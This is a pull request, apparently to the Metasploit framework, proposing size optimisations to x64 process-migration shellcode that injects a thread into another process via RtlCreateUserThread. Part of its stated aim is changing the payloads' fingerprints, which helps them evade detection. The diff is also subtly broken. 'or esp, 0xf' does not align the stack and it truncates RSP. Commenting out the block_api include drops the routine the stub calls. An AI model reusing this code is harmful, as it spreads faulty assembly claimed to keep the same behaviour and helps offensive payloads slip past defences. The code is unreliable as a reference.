### PR TITLE
idea : editing the assembly shellcodes to be slightly smaller

### DIFF
--- a/external/source/shellcode/windows/x64/src/migrate/remotethread.asm
+++ b/external/source/shellcode/windows/x64/src/migrate/remotethread.asm
@@ -37,18 +37,18 @@
 ;} WOW64CONTEXT, * LPWOW64CONTEXT;
 
 [BITS 64]
-[ORG 0]
+;[ORG 0]
   cld                    ; Clear the direction flag.
   mov rsi, rcx           ; RCX is a pointer to our WOW64CONTEXT parameter
   mov rdi, rsp           ; save RSP to RDI so we can restore it later, we do this as we are going to force alignment below...
-  and rsp, 0xFFFFFFFFFFFFFFF0 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
+  or esp, 0xf		 ; Ensure RSP is 16 byte aligned (as we originate from a wow64 (x86) process we cant guarantee alignment)
   call start             ; Call start, this pushes the address of 'api_call' onto the stack.
 delta:                   ;
-%include "./src/block/block_api.asm"
+;%include "./src/block/block_api.asm"
 start:                   ;
   pop rbp                ; Pop off the address of 'api_call' for calling later.
   ; setup the parameters for RtlCreateUserThread...
-  xor r9, r9             ; StackZeroBits = 0
+  xor r9d, r9d             ; StackZeroBits = 0
   push r9                ; ClientID = NULL
   lea rax, [rsi+24]      ; RAX is now a pointer to ctx->t.hThread
   push rax               ; ThreadHandle = &ctx->t.hThread
@@ -56,18 +56,18 @@ start:                   ;
   push qword [rsi+8]     ; StartAddress = ctx->s.lpStartAddress
   push r9                ; StackCommit = NULL
   push r9                ; StackReserved = NULL
-  mov r8, 1              ; CreateSuspended = TRUE
-  xor rdx, rdx           ; SecurityDescriptor = NULL
+  mov r8d, 1              ; CreateSuspended = TRUE
+  xor edx, edx           ; SecurityDescriptor = NULL
   mov rcx, [rsi]         ; ProcessHandle = ctx->h.hProcess
   ; perform the call to RtlCreateUserThread...
   mov r10d, 0x40A438C8   ; hash( "ntdll.dll", "RtlCreateUserThread" ) 
   call rbp               ; RtlCreateUserThread( ctx->h.hProcess, NULL, TRUE, 0, NULL, NULL, ctx->s.lpStartAddress, ctx->p.lpParameter, &ctx->t.hThread, NULL )
   test rax, rax          ; check the NTSTATUS return value
   jz success             ; if its zero we have successfully created the thread so we should return TRUE
-  mov rax, 0             ; otherwise we should return FALSE
+  xor eax, eax             ; otherwise we should return FALSE
   jmp cleanup            ;
 success:
-  mov rax, 1             ; return TRUE
+  mov eax, 1             ; return TRUE
 cleanup:
   add rsp, (32 + (8*6))  ; fix up stack (32 bytes for the single call to api_call, and 6*8 bytes for the six params we pushed).
   mov rsp, rdi           ; restore the stack


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

hello, while reading the assembly source files on this project, I've noticed that there is a room for small optimization here and there to make the shellcodes slightly smaller, one example is the source I edited resulting in a shellcode that is 5 bytes smaller (mostly by removing unnecessary null bytes ), I know this is not important change, which is why I'm asking if this is wanted before I put some time in tuning all x86 assembly files

another reason (which is also just a another minor inconvenience) is the inconsistency across the code

- I've notices that file most files are written in Intel syntax with a few exceptions such as ./external/source/shellcode/linux/x64/stager_sock_reverse.s which is written in AT&T, I could edit those files to be in Intel syntax as well

- also unlike other assembly sources, the mentioned file uses push/pop to copy values between registers, which can reduce the size even more, but it's not used in other files 

Pros this change will bring
- somehow-new shellcodes with slightly less size
- changing the shellcodes fingerprint/hash while maintaining the same functionality

if this idea gets approved, I will assemble the new shellcodes, and and replace the old ones in metasploit-payloads project (i.e shellcodes likes [this](https://github.com/rapid7/metasploit-payloads/blob/9b65001dae9b1ff207bda0ec68c3c84543bee417/c/meterpreter/source/metsrv/base_inject.c#L10))

and the change will concern all x64/x86_64 assembly files, let me know what you think

also note that the file I changed is just an untested very simple PoC, more tuning/re-writing can be done to make it a bit more smaller